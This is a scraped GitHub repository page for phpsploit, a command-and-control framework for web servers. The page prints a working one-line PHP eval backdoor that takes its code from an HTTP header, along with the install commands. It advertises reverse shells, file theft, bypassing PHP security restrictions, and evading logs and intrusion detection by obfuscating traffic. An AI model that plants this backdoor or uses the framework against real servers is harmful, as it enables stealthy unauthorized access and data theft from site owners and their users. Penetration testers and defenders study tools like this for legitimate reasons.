Uh oh!
There was an error while loading.Please reload this page.
- Notifications
You must be signed in to change notification settings - Fork468
Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoor
License
nil0x42/phpsploit
Folders and files
| Name | Name | Last commit message | Last commit date | |
|---|---|---|---|---|
Repository files navigation
The obfuscated communication is accomplished using HTTP headers understandard client requests and web server's relative responses, tunneledthrough a tinypolymorphic backdoor:
<?php @eval($_SERVER['HTTP_PHPSPL01T']);?>
git clone https://github.com/nil0x42/phpsploitcd phpsploit/pip3 install -r requirements.txt./phpsploit --interactive --eval"help help"
Efficient: More than 20 plugins to automate privilege-escalation tasks
- Run commands and browse filesystem, bypassing PHP security restrictions
- Upload/Download files between client and target
- Edit remote files through local text editor
- Run SQL console on target system
- Spawn reverse TCP shells
Stealth: The framework is made by paranoids, for paranoids
- Nearly invisible by log analysis and NIDS signature detection
- Safe-mode and commonPHP security restrictions bypass
- Communications are hidden in HTTP Headers
- Loaded payloads are obfuscated tobypass NIDS
- http/https/socks4/socks5Proxy support
Convenient: A robust interface with many crucial features
- Detailed help for any option (
helpcommand) - Cross-platform on both client and server.
- CLI supports auto-completion & multi-command
- Session saving/loading feature & persistent history
- Multi-request support for large payloads (such as uploads)
- Provides a powerful, highly configurable settings engine
- Each setting, such as user-agent has apolymorphic mode
- Customisable environment variables for plugin interaction
- Provides a complete plugin development API
- Detailed help for any option (
- GNU/Linux
- Mac OS X
- GNU/Linux
- BSD-like
- Mac OS X
- Windows NT
Thanks goes to these wonderful people:
nil0x42 💻🚇🔌 | shiney-wh 💻🔌 | Wannes Rombouts 💻🚧 | Amine Ben Asker 💻🚧 | jose nazario 📖🐛 | Sujit Ghosal 📝 | Zerdoumi 🐛 |
tristandostaler 🐛 | Rohan Tarai 🐛 | Jonas Lejon 📝 |
This project follows theall-contributors specification. Contributions of any kind welcome
About
Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoor
Topics
Resources
License
Uh oh!
There was an error while loading.Please reload this page.
Stars
Watchers
Forks
Sponsor this project
Uh oh!
There was an error while loading.Please reload this page.
Uh oh!
There was an error while loading.Please reload this page.
Contributors11
Uh oh!
There was an error while loading.Please reload this page.

